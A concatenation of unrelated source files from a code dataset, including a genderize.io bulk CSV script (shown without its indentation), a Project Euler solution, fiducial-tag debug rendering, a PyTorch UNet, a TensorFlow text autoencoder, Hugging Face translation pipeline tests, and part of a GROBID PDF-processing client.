# iterate through each item in the row we just saved and keep track of the for loop index
for index, column in enumerate(first_name[0]):
# if our column name is equal to the override name, we found the index number we need to proceed. Break from the loop
if column == args.override:
column_number = index
break
# error detection if the user override is not found in the header of the input csv.
if index == len(first_name[0])-1:
print("User Override '" + args.override + "' not found in input CSV file, Exiting...")
sys.exit()
# Our column number should be found by now, so continue to import the specific data that we want.
else:
# IMPORTANT: we need to remove all leading and trailing whitespaces to ensure that the genderizer responds with correct information
stripped = row[column_number].strip()
# append our stripped string onto the first_name list
first_name.append(stripped)
# save the entire row to the raw list
raw.append(row)
# if no override, continue like normal
else:
first_name.append(row)
# if we have a header, we need to remove it so it is not included in the submission
if args.noheader == False:
if is_override:
# Before we pop the first list item in first_name, save it to be our original headers so we can write them later
original_headers = first_name[0]
# We also need to pop the for item in the raw list or we will end up with extra data
raw.pop(0)
first_name.pop(0) #Remove header
o_first_name = list()
# We dont need to strip the first name list if we are overriding because it has already been taken care of
if is_override:
o_first_name = first_name
# Removes the [''] on each list item so we just end up with names when iterating through the list
else:
for l in first_name:
for b in l:
o_first_name.append(b)
# moved uniq_first_name outside of the if statement for later use.
uniq_first_name = []
if args.auto == True:
uniq_first_name = list(dict.fromkeys(o_first_name))
            chunks = list(jpyh.splitlist(uniq_first_name, 10))
            print("--- Read CSV with " + str(len(first_name)) + " first names. " + str(len(uniq_first_name)) + " unique.")
        else:
            # splitting the name list into chunks of 10 due to API restrictions
            chunks = list(jpyh.splitlist(first_name, 10))
            print("--- Read CSV with " + str(len(first_name)) + " first names")
print("--- Processed into " + str(len(chunks)) + " chunks")
if jpyh.query_yes_no("\n---! Ready to send to Genderdize. Proceed?") == False:
print("Exiting...\n")
sys.exit()
if os.path.isfile(ofile):
if jpyh.query_yes_no("---! Output file exists, overwrite?") == False:
print("Exiting...\n")
sys.exit()
print("\n")
if args.auto == True:
ofile = ofile + ".tmp"
response_time = [];
gender_responses = list()
with open(ofile, 'w', newline='', encoding="utf8") as f:
writer = csv.writer(f)
## TODO Add new system to write all rows of the original file. Done
# If we are overriding, we need to write different headers into the output csv file. We call the write_headers function to keep the code clean
if is_override:
write_headers(writer, original_headers)
# else, continue as expected
else:
writer.writerow(list(["first_name","gender", "probability", "count"]))
chunks_len = len(chunks)
stopped = False
for index, chunk in enumerate(chunks):
if stopped:
break
success = False
while not success:
try:
start = time.time()
if key_present:
dataset = genderize.get(chunk)
else:
dataset = Genderize().get(chunk)
gender_responses.append(dataset)
success = True
except GenderizeException as e:
#print("\n" + str(e))
logger.error(e)
#Error handling
if "response not in JSON format" in str(e) and args.catch == True:
if jpyh.query_yes_no("\n---!! 502 detected, try again?") == True:
success = False
continue
elif "Invalid API key" in str(e) and args.catch == True:
print("\n---!! Error, invalid API key! Check log file for details.\n")
else:
print("\n---!! GenderizeException - You probably exceeded the request limit, please add or purchase a API key. Check log file for details.\n")
stopped = True
break
response_time.append(time.time() - start)
print("Processed chunk " + str(index + 1) + " of " + str(chunks_len) + " -- Time remaining (est.): " + \
str( round( (sum(response_time) / len(response_time) * (chunks_len - index - 1)), 3)) + "s")
gender_dict = dict()
# Moved this function out of the autocomplete function to allow us to use it for the non-autocomplete writing as well
for response in gender_responses:
for d in response:
gender_dict[d.get("name")] = [d.get("gender"), d.get("probability"), d.get("count")]
# we need to iterate over all of our "cleaned" first names
for index, name in enumerate(o_first_name):
data = gender_dict.get(name)
# If we are overriding, we need to print our raw data plus our genderize information.
if is_override:
data_list = [data[0], data[1], data[2]]
writer.writerow(raw[index] + data_list)
# If we are not overriding, we print the standard information
else:
writer.writerow([name, data[0], data[1], data[2]])
# if we have the autocomplete enabled, we need to allow overriding in this mode as well.
if args.auto == True:
print("\nCompleting identical first_name...\n")
filename, file_extension = os.path.splitext(ofile)
with open(filename, 'w', newline='', encoding="utf8") as f:
writer = csv.writer(f)
# Before we enter the for loop, we need to print the correct headers into the output csv file.
# If we are overriding, we need to print out saved original headers as well as the new headers. We call our write_headers function to keep the code clean
if is_override:
write_headers(writer, original_headers)
# we need to remove duplicate items in our raw file for proper file writing.
raw_cleaned = remove_dupes(raw, column_number)
# If we are not overriding, we can print the standard headers.
else:
writer.writerow(list(["first_name","gender", "probability", "count"]))
            # We need to iterate over our uniq_first_name list in order to write the correct names
            for index, name in enumerate(uniq_first_name):
                # If we are overriding, we combine the data received from the Genderize API with our cleaned raw list in order to write the correct information
if is_override:
data = gender_dict.get(name)
data_list = [data[0], data[1], data[2]]
writer.writerow(raw_cleaned[index] + data_list)
# If we are not overriding, we can perform everything as expected.
else:
data = gender_dict.get(name)
writer.writerow([name, data[0], data[1], data[2]])
print("Done!\n")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Bulk genderize.io script')
required = parser.add_argument_group('required arguments')
required.add_argument('-i','--input', help='Input file name', required=True)
required.add_argument('-o','--output', help='Output file name', required=True)
parser.add_argument('-k','--key', help='API key', required=False, default="NO_API")
parser.add_argument('-c','--catch', help='Try to handle errors gracefully', required=False, action='store_true', default=True)
parser.add_argument('-a','--auto', help='Automatically complete gender for identical first_name', required=False, action='store_true', default=False)
parser.add_argument('-nh','--noheader', help='Input has no header row', required=False, action='store_true', default=False)
parser.add_argument('-ovr','--override',help='override the default search column', required=False, default='NO_OVERRIDE')
genderize(parser.parse_args())
``` |
{
"source": "josephcarmack/projectEuler",
"score": 3
} |
#### File: josephcarmack/projectEuler/problem1.py
```python
def problem1(number2go2):
s=0.0
for i in range(number2go2):
if(i%3==0 or i%5==0):
s += i
return s
print(problem1(1000))
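# For n = 1000 this prints 233168.0 (the sum accumulator starts as the float 0.0).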
``` |
{
"source": "JosephCatrambone/BlenderTopoTag",
"score": 3
} |
#### File: JosephCatrambone/BlenderTopoTag/debug.py
```python
import numpy
from fiducial import TopoTag
def save_plain_ppm(img, filename: str):
"""Save a matrix (floats) as a PPM image."""
with open(filename, 'wt') as fout:
fout.write("P3\n")
fout.write(f"{img.shape[1]} {img.shape[0]}\n")
fout.write("255\n")
idx = 0
for y in range(img.shape[0]):
for x in range(img.shape[1]):
if len(img.shape) == 2:
fout.write(str(int(255 * img[y, x])))
fout.write(" ")
fout.write(str(int(255 * img[y, x])))
fout.write(" ")
fout.write(str(int(255 * img[y, x])))
elif len(img.shape) == 3:
fout.write(str(int(255 * img[y, x, 0])))
fout.write(" ")
fout.write(str(int(255 * img[y, x, 1])))
fout.write(" ")
fout.write(str(int(255 * img[y, x, 2])))
if idx >= 5: # Max line length is 70. 3 digits + space * 3 channels -> 12. 70/12 ~> 5.
fout.write("\n")
idx = 0
else:
fout.write(" ")
idx += 1
fout.flush()
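# Usage sketch (hedged): save_plain_ppm(numpy.zeros((4, 4)), "out.ppm") writes a
# 4x4 black image; 2D inputs are treated as grayscale, 3D as RGB, values in [0, 1].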
def debug_render_cube(tag: TopoTag, canvas):
"""Render a cube from the perspective of the camera."""
points_3d = numpy.asarray([
[0, 0, 0, 1],
[1, 0, 0, 1],
[1, 1, 0, 1],
[0, 1, 0, 1],
[0, 0, 1, 1],
[1, 0, 1, 1],
[1, 1, 1, 1],
[0, 1, 1, 1],
])
projection_matrix = tag.pose_raw # tag.extrinsics.to_matrix()
projection = (projection_matrix @ points_3d.T).T
projection[:, 0] /= projection[:, 2]
projection[:, 1] /= projection[:, 2]
#projection[:, 2] /= projection[:, 2]
# Draw faces...
for i in range(0, 4):
canvas.line((projection[i, 0], projection[i, 1], projection[(i+1)%4, 0], projection[(i+1)%4, 1]), fill=(255, 255, 255))
        canvas.line((projection[(i+4), 0], projection[(i+4), 1], projection[4 + (i+1)%4, 0], projection[4 + (i+1)%4, 1]), fill=(255, 255, 255))
    # Draw vertical edges between the top and bottom faces.
    for i in range(0, 4):
        canvas.line((projection[i, 0], projection[i, 1], projection[i+4, 0], projection[i+4, 1]), fill=(255, 255, 255))
    print(projection)
def debug_show_tags(tags, island_data, island_matrix, show=True):
from PIL import ImageDraw
# Render a color image for the island_matrix.
img = debug_show_islands(island_matrix, show=False)
canvas = ImageDraw.Draw(img)
# Draw some red borders for candidate islands.
#for island in island_data[2:]:
# canvas.rectangle((island.x_min, island.y_min, island.x_max, island.y_max), outline=(255, 0, 0))
# Draw a pink border for each tag.
for tag in tags:
island_id = tag.island_id
for vertex in tag.vertex_positions:
canvas.rectangle((vertex[0]-1, vertex[1]-1, vertex[0]+1, vertex[1]+1), outline=(200, 200, 200))
canvas.text((island_data[island_id].x_min, island_data[island_id].y_min), f"I{island_id} - Code{tag.tag_id}", fill=(255, 255, 255))
canvas.rectangle((island_data[island_id].x_min, island_data[island_id].y_min, island_data[island_id].x_max, island_data[island_id].y_max), outline=(255, 0, 255))
canvas.line((tag.top_left[0], tag.top_left[1], tag.top_right[0], tag.top_right[1]), fill=(0, 255, 255))
canvas.line((tag.top_left[0], tag.top_left[1], tag.bottom_left[0], tag.bottom_left[1]), fill=(0, 255, 255))
#debug_render_cube(tag, canvas)
print(f"Tag origin: {tag.extrinsics.x_translation}, {tag.extrinsics.y_translation}, {tag.extrinsics.z_translation}")
if show:
img.show()
return img
def debug_show_islands(classes, show=True):
from PIL import Image
import itertools
num_classes = classes.max()
class_colors = list(itertools.islice(itertools.product(list(range(64, 255, 1)), repeat=3), num_classes+1))
colored_image = Image.new('RGB', (classes.shape[1], classes.shape[0]))
# This is the wrong way to do it. Should just cast + index.
for y in range(classes.shape[0]):
for x in range(classes.shape[1]):
colored_image.putpixel((x,y), class_colors[classes[y,x]])
if show:
colored_image.show()
return colored_image
def debug_show(mat):
from PIL import Image
img = Image.fromarray(mat*255.0)
img.show()
``` |
{
"source": "JosephCatrambone/greppic",
"score": 2
} |
#### File: greppic/training/model.py
```python
import math
import torch
import torch.nn as nn
def assert_power_of_two(n: int):
assert 2**int(math.log(n)/math.log(2)) == n
class Reshape(nn.Module):
# Resize to the target shape, auto-inferring the -1 dimension from the rest.
def __init__(self, *shape):
super(Reshape, self).__init__()
self.shape = shape
def forward(self, x):
return x.view(*self.shape)
class DoubleConv(nn.Module):
def __init__(self, in_channels: int, out_channels: int):
super(DoubleConv, self).__init__()
self.op = nn.Sequential(
# No bias 'cause we're using BatchNorm. It will get cancelled out.
nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(out_channels),
nn.SiLU(inplace=True),
nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(out_channels),
nn.SiLU(inplace=True),
)
def forward(self, x):
return self.op(x)
class UNet(nn.Module):
def __init__(self, in_channels:int = 3, out_channels: int = 3, feature_counts=None):
super(UNet, self).__init__()
# Prevent modification of mutable default.
if feature_counts is None:
feature_counts = [64, 128, 256, 512]
# Need nn.ModuleList instead of List for batch evals.
self.downsamples = nn.ModuleList()
self.bottleneck = DoubleConv(feature_counts[-1], feature_counts[-1]*2)
self.upsamples = nn.ModuleList()
self.finalconv = nn.Conv2d(feature_counts[0], out_channels, kernel_size=1) # 1x1 conv -> Change # feats.
# Downsample-Reduction step.
num_channels = in_channels
for f_count in feature_counts:
self.downsamples.append(DoubleConv(in_channels=num_channels, out_channels=f_count))
num_channels = f_count
# Up-steps.
for f_count in reversed(feature_counts):
            # For these, one needs to step by 3 in the upsample step:
# Use 2x Upscale / Depth-convolve as an operation.
#self.upsamples.append(nn.UpsamplingBilinear2d(scale_factor=2))
#self.upsamples.append(nn.Conv2d(f_count*2, f_count, kernel_size=1))
# Use 4x Upscale / Double-convolve as an operation.
#self.upsamples.append(nn.UpsamplingNearest2d(scale_factor=4))
#self.upsamples.append(DoubleConv(f_count*2, f_count))
# For this one needs to step by two in the upsample step. (See upsample_step_size)
# Use ConvTranspose as an operation:
self.upsamples.append(nn.ConvTranspose2d(f_count*2, f_count, kernel_size=2, stride=2)) # Upscale 2x.
# Final concatenated convolution:
self.upsamples.append(DoubleConv(f_count*2, f_count))
def forward(self, x):
skip_connections = list() # Don't need ModuleList because this is not retained.
for dwn in self.downsamples:
x = dwn(x)
skip_connections.append(x)
x = torch.max_pool2d(x, kernel_size=2, stride=2)
x = self.bottleneck(x)
skip_connections.reverse()
upsample_step_size = 2
for idx in range(0, len(self.upsamples), upsample_step_size):
x = self.upsamples[idx+0](x)
#x = self.upsamples[idx+1](x)
skip_x = skip_connections[idx//upsample_step_size]
# It's possible that due to integer division the sizes slightly mismatch.
#if x.shape[2] != skip_x.shape[2] or x.shape[3] != skip_x.shape[3]:
            # This causes issues with unpacking non-iterables:
#_, _, h, w = sk.shape
#x = torchvision.transforms.CenterCrop((h, w))(x)
# This causes issues with PIL/Tensor mismatch.
#x = VF.resize(x, size=sk.shape[2:])
#x = torchvision.transforms.functional.resize(x, size=sk.shape[2:])
# This seems to work:
#x = torch.nn.functional.interpolate(x, size=skip_x.shape[2:])
assert len(skip_x.shape) == 4 # So we don't accidentally unpinch another dimension.
concat_skip = torch.cat((skip_x, x), dim=1) # Dim 1 is channel-dimension. [b, c, h, w]
x = self.upsamples[idx+1](concat_skip)
return torch.sigmoid(self.finalconv(x))
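# Minimal smoke-test sketch (an addition, not part of the original module): spatial
# dims must be divisible by 2**len(feature_counts) so the skip connections line up.
if __name__ == "__main__":
    net = UNet(in_channels=3, out_channels=3)
    batch = torch.randn(1, 3, 64, 64)
    out = net(batch)
    assert out.shape == (1, 3, 64, 64)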
``` |
{
"source": "JosephCatrambone/NLP_TensorFlow",
"score": 3
} |
#### File: JosephCatrambone/NLP_TensorFlow/bitreader.py
```python
from random import random
import numpy
TERMINATOR = "\0"
CHARSET = " abcdefghijklmnopqrstuvwxyz.:;'\"" + TERMINATOR
CHARACTER_SET = set(CHARSET) # Some naming ambiguity. Forgive me.
INDEX_CHARACTER_MAP = {k:v for k,v in enumerate(CHARSET)} # index -> letter
CHARACTER_INDEX_MAP = {v:k for k,v in enumerate(CHARSET)} # letter -> index
def get_sentence_vector_length(character_limit):
return character_limit*len(CHARSET)
def string_to_vector(sentence, flatten=True):
vector = list()
for character in sentence.lower():
subvector = numpy.zeros(len(CHARSET))
if character in CHARACTER_SET:
subvector[CHARACTER_INDEX_MAP[character]] = 1.0
vector.append(subvector)
result = numpy.asarray(vector)
if flatten:
result = result.reshape(1,-1)[0]
return result
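# Example sketch (hedged, not part of the original module): string_to_vector("ab")
# returns a flat one-hot vector of length 2 * len(CHARSET); with flatten=False the
# shape is (2, len(CHARSET)), one row per character.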
def vector_to_string(vector):
# Flatten if in square setup.
if vector.ndim == 2:
vector = vector.reshape(1,-1)[0]
s = ""
# Step through vector in CHARSET increments.
block_length = len(CHARSET)
for index in range(0, len(vector), block_length):
block = vector[index:index+block_length]
block_energy = block.sum()
energy = random()*block_energy # This block defines a probability distribution.
if block_energy == 0:
continue # No prediction?
# TODO: Add an invalid char.
for subindex in range(block_length):
# Did we randomly select this character?
if energy < block[subindex]:
# Yes.
                # Also, is this the end-of-line (terminator) character?
char = INDEX_CHARACTER_MAP[subindex]
if char == TERMINATOR:
return s
else:
s += char
                    break
else:
energy -= block[subindex]
return s
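# Round-trip sketch (hedged): vector_to_string(string_to_vector("cat", flatten=False))
# returns "cat", since each one-hot block puts all of its probability mass on a
# single character.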
```
#### File: JosephCatrambone/NLP_TensorFlow/nlp_tensorflow.py
```python
import sys, os
import csv
import gzip
import numpy
import tensorflow as tf
import bitreader
# We have some big fields.
csv.field_size_limit(sys.maxsize)
# Globals
INPUT_FILENAME = sys.argv[1]
DATA_COLUMN = int(sys.argv[2])
LEARNING_RATE = 0.01
TRAINING_ITERATIONS = 20000000
BATCH_SIZE = 5
SENTENCE_LIMIT = 140 # Empty pad after this.
N_INPUTS = bitreader.get_sentence_vector_length(SENTENCE_LIMIT)
WORD_CHUNK_SIZE = 4
DROPOUT = 0.8
DISPLAY_INCREMENT = 1
# Create model
x = tf.placeholder(tf.types.float32, [None, 1, N_INPUTS, 1])
keep_prob = tf.placeholder(tf.types.float32) #dropout
def build_model(name, inputs, dropout_toggle, char_sample_size=WORD_CHUNK_SIZE):
#x = tf.reshape(inputs, shape=[-1, 1, N_INPUTS, 1])
filter_bank_0 = 16
filter_bank_1 = 8
filter_bank_3 = 64
# conv2d input is [b, h, w, d]
# filter is [h, w, ...]
# multiplied by filter [di, dj, :, :]
sample_vec_len = bitreader.get_sentence_vector_length(char_sample_size)
wc1 = tf.Variable(tf.random_normal([1, sample_vec_len, 1, filter_bank_0]))
bc1 = tf.Variable(tf.random_normal([filter_bank_0,]))
conv1 = tf.nn.conv2d(inputs, wc1, strides=[1, 1, 1, 1], padding='SAME') + bc1
act1 = tf.nn.relu(conv1)
# TensorShape([Dimension(None), Dimension(1), Dimension(4620), Dimension(64)])
wc2 = tf.Variable(tf.random_normal([1, char_sample_size, filter_bank_0, filter_bank_1]))
bc2 = tf.Variable(tf.random_normal([filter_bank_1,]))
conv2 = tf.nn.conv2d(act1, wc2, strides=[1, 1, 1, 1], padding='SAME') + bc2
act2 = tf.nn.relu(conv2)
norm2 = tf.nn.lrn(act2, bitreader.get_sentence_vector_length(1), bias=1.0, alpha=0.001, beta=0.75)
# TensorShape([Dimension(None), Dimension(1), Dimension(4620), Dimension(32)])
# Conv -> FC
# Record encoder shapes for later use.
act2_shape = act2.get_shape().as_list()
act1_shape = act1.get_shape().as_list()
input_shape = inputs.get_shape().as_list()
# Resize
c_fc = tf.reshape(act2, [-1, act2_shape[1]*act2_shape[2]*act2_shape[3]])
# FC segments
wf1 = tf.Variable(tf.random_normal([act2_shape[1]*act2_shape[2]*act2_shape[3], filter_bank_3]))
bf1 = tf.Variable(tf.random_normal([filter_bank_3,]))
full1 = tf.matmul(c_fc, wf1) + bf1
act3 = tf.nn.relu(full1)
# Our prized encoder.
encoder = act3
# Invert steps and begin decoder.
# Start with FC.
wf2 = tf.Variable(tf.random_normal([filter_bank_3, act2_shape[1]*act2_shape[2]*act2_shape[3]]))
bf2 = tf.Variable(tf.random_normal([act2_shape[1]*act2_shape[2]*act2_shape[3],]))
full2 = tf.matmul(act3, wf2) + bf2
act4 = tf.nn.relu(full2)
# FC -> Conv
fc_c = tf.reshape(act4, [-1, act2_shape[1], act2_shape[2], act2_shape[3]])
wc3 = tf.Variable(tf.random_normal([1, char_sample_size, filter_bank_0, filter_bank_1]))
bc3 = tf.Variable(tf.random_normal([act1_shape[1], act1_shape[2], act1_shape[3]]))
conv3 = tf.nn.deconv2d(fc_c, wc3, strides=[1, 1, 1, 1], padding='SAME', output_shape=[-1, act1_shape[1], act1_shape[2], act1_shape[3]]) + bc3
act5 = tf.nn.relu(conv3)
# TensorShape([Dimension(None), Dimension(1), Dimension(4620), Dimension(64)])
wc4 = tf.Variable(tf.random_normal([1, sample_vec_len, 1, filter_bank_0]))
bc4 = tf.Variable(tf.random_normal([input_shape[1], input_shape[2], input_shape[3]]))
conv4 = tf.nn.deconv2d(act5, wc4, strides=[1, 1, 1, 1], padding='SAME', output_shape=[-1, input_shape[1], input_shape[2], input_shape[3]]) + bc4
act6 = tf.nn.relu(conv4)
norm3 = tf.nn.lrn(act6, bitreader.get_sentence_vector_length(1), bias=1.0, alpha=0.001, beta=0.75)
decoder = norm3
return encoder, decoder, [wc1, wc2, wf1, wf2, wc3, wc4], [bc1, bc2, bc3, bc4]
#return tf.nn.max_pool(l_input, ksize=[1, 1, k, 1], strides=[1, 1, k, 1], padding='SAME', name=name)
print("Building model.")
encoder, decoder, weights, biases = build_model("ConvNLP", x, keep_prob)
print("Defining loss functions and optimizer.")
#l2_cost = tf.reduce_sum(tf.nn.l2_loss(reconstruction, x))
l1_cost = tf.reduce_sum(tf.abs(tf.sub(x, decoder)))
cost = l1_cost
optimizer = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE).minimize(cost)
# Define our data iterator
def csv_iterator(filename=INPUT_FILENAME):
if filename.endswith(".gz"):
fin = gzip.open(filename, 'r')
else:
fin = open(filename, 'r')
cin = csv.reader(fin)
for line in cin:
text = line[DATA_COLUMN] # 0 is entry name.
# Iterate through N characters at a time.
for index in range(0, len(text), SENTENCE_LIMIT):
segment = text[index:index+SENTENCE_LIMIT]
segment = segment + "\0"*(SENTENCE_LIMIT-len(segment)) # Zero-pad our sentence.
yield bitreader.string_to_vector(segment)
def batch_buffer(filename=INPUT_FILENAME, batch_size=BATCH_SIZE):
iterator = csv_iterator(filename)
while True:
batch = numpy.zeros([batch_size, 1, bitreader.get_sentence_vector_length(SENTENCE_LIMIT), 1], dtype=numpy.float)
for index, example in zip(range(batch_size), iterator):
batch[index,0,:,0] = example[:]
yield batch
# Train
print("Gathering variables.")
init = tf.initialize_all_variables()
saver = tf.train.Saver()
print("Beginning training session.")
with tf.Session() as sess:
print("Initializing variables.")
sess.run(init)
step = 1
generator = batch_buffer()
print("Session, variables, and generator initialized. Training.")
for step, batch_xs in zip(range(TRAINING_ITERATIONS // BATCH_SIZE), generator):
sess.run(optimizer, feed_dict={x: batch_xs, keep_prob: DROPOUT})
if step % DISPLAY_INCREMENT == 0:
loss = sess.run(cost, feed_dict={x: batch_xs, keep_prob: 1.})
enc, rec = sess.run([encoder, decoder], feed_dict={x: batch_xs, keep_prob: 1.})
print("Iter " + str(step*BATCH_SIZE) + ", Loss= " + "{:.6f}".format(loss))
print("Mapping {} -> {}".format(enc.shape, rec.shape))
print("Example: {} -> {}".format(bitreader.vector_to_string(batch_xs[0,0,:,0]), bitreader.vector_to_string(rec[0,0,:,0])))
step += 1
print "Optimization Finished!"
# sess.run(accuracy, feed_dict={x: asdf, keep_prob: 1.})
# Save results
result = saver.save(sess, "result.ckpt")
print("Saved model to {}".format(result))
``` |
{
"source": "JosephCatrambone/transformers",
"score": 2
} |
#### File: transformers/tests/test_pipelines_translation.py
```python
import unittest
import pytest
from transformers import pipeline
from transformers.testing_utils import is_pipeline_test, is_torch_available, require_torch, slow
from .test_pipelines_common import MonoInputPipelineCommonMixin
if is_torch_available():
from transformers.models.mbart import MBart50TokenizerFast, MBartForConditionalGeneration
class TranslationEnToDePipelineTests(MonoInputPipelineCommonMixin, unittest.TestCase):
pipeline_task = "translation_en_to_de"
small_models = ["patrickvonplaten/t5-tiny-random"] # Default model - Models tested without the @slow decorator
large_models = [None] # Models tested with the @slow decorator
invalid_inputs = [4, "<mask>"]
mandatory_keys = ["translation_text"]
class TranslationEnToRoPipelineTests(MonoInputPipelineCommonMixin, unittest.TestCase):
pipeline_task = "translation_en_to_ro"
small_models = ["patrickvonplaten/t5-tiny-random"] # Default model - Models tested without the @slow decorator
large_models = [None] # Models tested with the @slow decorator
invalid_inputs = [4, "<mask>"]
mandatory_keys = ["translation_text"]
@is_pipeline_test
class TranslationNewFormatPipelineTests(unittest.TestCase):
@require_torch
@slow
def test_default_translations(self):
# We don't provide a default for this pair
with self.assertRaises(ValueError):
pipeline(task="translation_cn_to_ar")
# but we do for this one
translator = pipeline(task="translation_en_to_de")
self.assertEqual(translator.src_lang, "en")
self.assertEqual(translator.tgt_lang, "de")
@require_torch
@slow
def test_multilingual_translation(self):
model = MBartForConditionalGeneration.from_pretrained("facebook/mbart-large-50-many-to-many-mmt")
tokenizer = MBart50TokenizerFast.from_pretrained("facebook/mbart-large-50-many-to-many-mmt")
translator = pipeline(task="translation", model=model, tokenizer=tokenizer)
# Missing src_lang, tgt_lang
with self.assertRaises(ValueError):
translator("This is a test")
outputs = translator("This is a test", src_lang="en_XX", tgt_lang="ar_AR")
self.assertEqual(outputs, [{"translation_text": "ูุฐุง ุฅุฎุชุจุงุฑ"}])
outputs = translator("This is a test", src_lang="en_XX", tgt_lang="hi_IN")
self.assertEqual(outputs, [{"translation_text": "เคฏเคน เคเค เคชเคฐเฅเคเฅเคทเคฃ เคนเฅ"}])
# src_lang, tgt_lang can be defined at pipeline call time
translator = pipeline(task="translation", model=model, tokenizer=tokenizer, src_lang="en_XX", tgt_lang="ar_AR")
outputs = translator("This is a test")
self.assertEqual(outputs, [{"translation_text": "ูุฐุง ุฅุฎุชุจุงุฑ"}])
@require_torch
def test_translation_on_odd_language(self):
model = "patrickvonplaten/t5-tiny-random"
translator = pipeline(task="translation_cn_to_ar", model=model)
self.assertEqual(translator.src_lang, "cn")
self.assertEqual(translator.tgt_lang, "ar")
@require_torch
def test_translation_default_language_selection(self):
model = "patrickvonplaten/t5-tiny-random"
with pytest.warns(UserWarning, match=r".*translation_en_to_de.*"):
nlp = pipeline(task="translation", model=model)
self.assertEqual(nlp.task, "translation_en_to_de")
self.assertEqual(nlp.src_lang, "en")
self.assertEqual(nlp.tgt_lang, "de")
@require_torch
def test_translation_with_no_language_no_model_fails(self):
with self.assertRaises(ValueError):
pipeline(task="translation")
``` |
{
"source": "josephcc/s2orc-doc2json",
"score": 3
} |
#### File: grobid2json/grobid/grobid_client.py
```python
import os
import io
import json
import argparse
import time
import glob
from doc2json.grobid2json.grobid.client import ApiClient
import ntpath
from typing import List
'''
This version uses the standard ProcessPoolExecutor for parallelizing the concurrent calls to the GROBID services.
Given the limits of ThreadPoolExecutor (input stored in memory, Executor.map blocking until the whole input
is acquired), it works with batches of PDFs of a size indicated in the config.json file (default is 1000 entries).
We move from the first batch to the second only when the first is entirely processed, which means it is
slightly sub-optimal but should scale better. However, acquiring a list of millions of files across directories
would also require something scalable, which is not implemented for the moment.
'''
SERVER = 'localhost'
if 'GROBID_URL' in os.environ:
SERVER = os.environ['GROBID_URL']
DEFAULT_GROBID_CONFIG = {
"grobid_server": SERVER,
"grobid_port": "8070",
"batch_size": 1000,
"sleep_time": 5,
"generateIDs": False,
"consolidate_header": False,
"consolidate_citations": False,
"include_raw_citations": True,
"segment_sentences": True,
"include_coordinates": ['s', 'bib', 'biblStruct', 'ref'],
"include_raw_affiliations": False,
"max_workers": 2,
}
class GrobidClient(ApiClient):
def __init__(self, config=None):
self.config = config or DEFAULT_GROBID_CONFIG
self.generate_ids = self.config["generateIDs"]
self.consolidate_header = self.config["consolidate_header"]
self.consolidate_citations = self.config["consolidate_citations"]
self.include_raw_citations = self.config["include_raw_citations"]
self.include_raw_affiliations = self.config["include_raw_affiliations"]
self.include_coordinates = self.config["include_coordinates"]
self.segment_sentences = self.config["segment_sentences"]
self.max_workers = self.config["max_workers"]
self.grobid_server = self.config["grobid_server"]
self.grobid_port = self.config["grobid_port"]
self.sleep_time = self.config["sleep_time"]
def process(self, input: str, output: str, service: str):
batch_size_pdf = self.config['batch_size']
pdf_files = []
for pdf_file in glob.glob(input + "/*.pdf"):
pdf_files.append(pdf_file)
if len(pdf_files) == batch_size_pdf:
self.process_batch(pdf_files, output, service)
pdf_files = []
# last batch
if len(pdf_files) > 0:
self.process_batch(pdf_files, output, service)
def process_batch(self, pdf_files: List[str], output: str, service: str) -> None:
print(len(pdf_files), "PDF files to process")
for pdf_file in pdf_files:
self.process_pdf(pdf_file, output, service)
def process_pdf_stream(self, pdf_file: str, pdf_strm: bytes, output: str, service: str) -> str:
# process the stream
files = {
'input': (
pdf_file,
pdf_strm,
'application/pdf',
{'Expires': '0'}
)
}
the_url = 'http://' + self.grobid_server
the_url += ":" + self.grobid_port
the_url += "/api/" + service
# set the GROBID parameters
the_data = {}
if self.generate_ids:
the_data['generateIDs'] = '1'
else:
the_data['generateIDs'] = '0'
if self.consolidate_header:
the_data['consolidateHeader'] = '1'
else:
the_data['consolidateHeader'] = '0'
if self.consolidate_citations:
the_data['consolidateCitations'] = '1'
else:
the_data['consolidateCitations'] = '0'
if self.include_raw_affiliations:
the_data['includeRawAffiliations'] = '1'
else:
the_data['includeRawAffiliations'] = '0'
if self.include_raw_citations:
the_data['includeRawCitations'] = '1'
else:
the_data['includeRawCitations'] = '0'
if self.segment_sentences:
the_data['segmentSentences'] = '1'
else:
the_data['segmentSentences'] = '0'
if self.include_coordinates:
the_data['teiCoordinates'] = self.include_coordinates
res, status = self.post(
url=the_url,
files=files,
data=the_data,
headers={'Accept': 'text/plain'}
)
if status == 503:
time.sleep(self.sleep_time)
return self.process_pdf_stream(pdf_file, pdf_strm, output, service)
elif status != 200:
with open(os.path.join(output, "failed.log"), "a+") as failed:
failed.write(os.path.splitext(pdf_file)[0] + "\n")
print('Processing failed with error ' + str(status))
return ""
else:
return res.text
def process_pdf(self, pdf_file: str, output: str, service: str) -> None:
# check if TEI file is already produced
# we use ntpath here to be sure it will work on Windows too
pdf_file_name = ntpath.basename(pdf_file)
filename = os.path.join(output, os.path.splitext(pdf_file_name)[0] + '.tei.xml')
if os.path.isfile(filename):
return
print(pdf_file)
pdf_strm = open(pdf_file, 'rb').read()
tei_text = self.process_pdf_stream(pdf_file, pdf_strm, output, service)
# writing TEI file
if tei_text:
with io.open(filename, 'w+', encoding='utf8') as tei_file:
tei_file.write(tei_text)
def process_citation(self, bib_string: str, log_file: str) -> str:
# process citation raw string and return corresponding dict
the_data = {
'citations': bib_string,
'consolidateCitations': '0'
}
the_url = 'http://' + self.grobid_server
the_url += ":" + self.grobid_port
the_url += "/api/processCitation"
for _ in range(5):
try:
res, status = self.post(
url=the_url,
data=the_data,
headers={'Accept': 'text/plain'}
)
if status == 503:
time.sleep(self.sleep_time)
continue
elif status != 200:
with open(log_file, "a+") as failed:
failed.write("-- BIBSTR --\n")
failed.write(bib_string + "\n\n")
break
else:
return res.text
except Exception:
continue
def process_header_names(self, header_string: str, log_file: str) -> str:
# process author names from header string
the_data = {
'names': header_string
}
the_url = 'http://' + self.grobid_server
the_url += ":" + self.grobid_port
the_url += "/api/processHeaderNames"
res, status = self.post(
url=the_url,
data=the_data,
headers={'Accept': 'text/plain'}
)
if status == 503:
time.sleep(self.sleep_time)
return self.process_header_names(header_string, log_file)
elif status != 200:
with open(log_file, "a+") as failed:
failed.write("-- AUTHOR --\n")
failed.write(header_string + "\n\n")
else:
return res.text
def process_affiliations(self, aff_string: str, log_file: str) -> str:
# process affiliation from input string
the_data = {
